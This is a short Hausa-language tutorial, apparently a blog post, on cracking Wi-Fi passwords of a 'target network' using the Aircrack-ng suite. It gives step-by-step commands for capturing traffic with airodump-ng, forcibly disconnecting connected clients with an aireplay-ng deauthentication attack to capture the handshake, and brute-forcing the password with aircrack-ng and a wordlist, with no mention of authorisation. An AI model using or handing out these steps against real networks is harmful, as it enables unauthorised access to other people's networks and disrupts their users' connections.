Mutane da yawa sukan tambayi tayaya zasu isa cracking din password na wifi network?
Ana cracking din wifi password ta hanyar amfani da tools daban daban. Wasu daga cikin tools din sun hada da:
- Wifite
- Aircrack-ng
- Fern wifi cracker
- wifi cracker da sauran su
sudo apt install aircrack-ng
Aircrack-ng yana zuwa da wasu tools din kamar haka: airmon-ng, aireplay-ng, airodump-ng etc. Zamu iya hacking din wifi network ta bin wannan mataken.
1. Za mu damki sakonnin dake fita daga daga cikin target network wato wanda zamu kai masa hari kamar haka
airodump-ng wlan0mon
2. Daga nan sai muyi amfani da airodump-ng domin muyi saving abinda muka damqa a baya (capture) a cikin sabon fayel kamar haka
airodump-ng -w capture_file --bssid <BSSID> wlan0mon
capture_file = sunan da kake so ka bashi(wanda aka damqa din)
BSSID = Sunan wifi din wifi din da muke attacking
3. Saanan zamu yi amfani da airepaly-ng domin mu sauke duk wata computer da ke kan network din. Wannan zai sa bayan mun sauke su su dawo domin sake connecting automatically. Sannan ya muna capture(damkar) handshake din.
aireplay-ng -0 2 -a <BSSID> -c <CLIENT_MAC> wlan0mon
BSSID= sunan network din da muke attacking
Client_mac = MAC address din da muke son cracking
4. Yanzu sai mu fara kokarin cracking din password din ta hanyar amfani da Aircrack-ng kamar haka
aircrack-ng capture_file -w wordlist.txt
wordlist.txt = shine jerangiyar passwords din da muke so ya gwada muna har sai ya samo ainihin password din.